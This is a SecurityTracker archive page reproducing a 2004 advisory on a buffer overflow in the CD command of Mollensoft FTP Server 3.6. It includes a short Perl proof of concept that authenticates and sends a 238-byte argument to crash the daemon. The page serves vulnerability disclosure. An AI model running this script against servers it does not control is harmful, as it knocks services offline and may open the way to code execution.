SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Mollensoft FTP Server (Hyperion) Vendors:   Mollensoft Software
Mollensoft FTP Server Can Be Crashed By Remote Authenticated Users With a CD Command
SecurityTracker Alert ID:  1010328
SecurityTracker URL:  http://securitytracker.com/id/1010328
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 29 2004
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.6
Description:   A buffer overflow vulnerability was reported in the Molensoft FTP Server in the processing of the CD command. A remote authenticated user can cause the FTP service to crash.

Chintan Trivedi of Eye on Security Research Group India reported that a remote authenticated user can issue a specially crafted CD command with 238 bytes to trigger the overflow and cause the FTP daemon to crash.

The report indicates that if properly exploited, a remote authenticated user may be able to gain access to the target system.

Impact:   A remote authenticated user can cause the FTP service to crash.

A remote authenticated user may be able to execute arbitrary code on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mollensoft.com/product2.htm (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Mollensoft ftp Server ver 3.6 Buffer overflow





[ Mollensoft ftp Server ver 3.6 Buffer overflow ]

-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------


Vendor         : http://www.mollensoft.com
Version	       : 3.6 (latest) 
Vulnerability  : Buffer Overflow


About Product 
=============

	Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for Windows95/98/NT/2000. It includes New Security and Faster,
 More Efficient Rules Based Access, Live Client activity Window as well as a specific Client breakdown window (below) and significant
 enhancement in speed/stability and is especially designed for Intranet Use!

(direct quote from website)

Description
===========

	A buffer overflow vulnerability exists in its "CD" command which can lead to READ any memory location. An attacker can pass a string
 of 238 bytes to the "CD" command to cause this overflow. 

ftp> CD AAAAAAA...(238 times)

The ftpd deamon at this point crashes with an error message saying 

"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not be read."

	On debugging the process, the instruction at memory location "0x50E0931F" is found to be "CMP BYTE PTR DS:[ESI], 1F" And the register
 ESI contains "41414141". So basically the application is trying to READ from 0x41414141. Thus in this manner an attacker can force
 the application to READ from any memory location. In worst cases if properly exploited the vulnerability can also lead to a remote
 exploit giving complete access to the vulnerable system. 

Proof Of Concept
================

# C:\Active Perl\perl
# POC for mollensoft ftp server 3.6
# Will crash the deamon

use IO::Socket::INET;

$host = "localhost";
$port = 21;
$buffer = "A" x 238;

$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

print $socket "USER root\r\n";
$socket->recv($test,100);
print $test;

print $socket "PASS password\r\n";
$socket->recv($test,100);
print $test;

print $socket "CD $buffer\r\n";
$socket->recv($test,100);
print $test;

close($socket);


Credits
=======

Chintan Trivedi - chesschintan [at] hotmail.com 
http://www.eos-india.net
Eye on Security Research Group - India

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC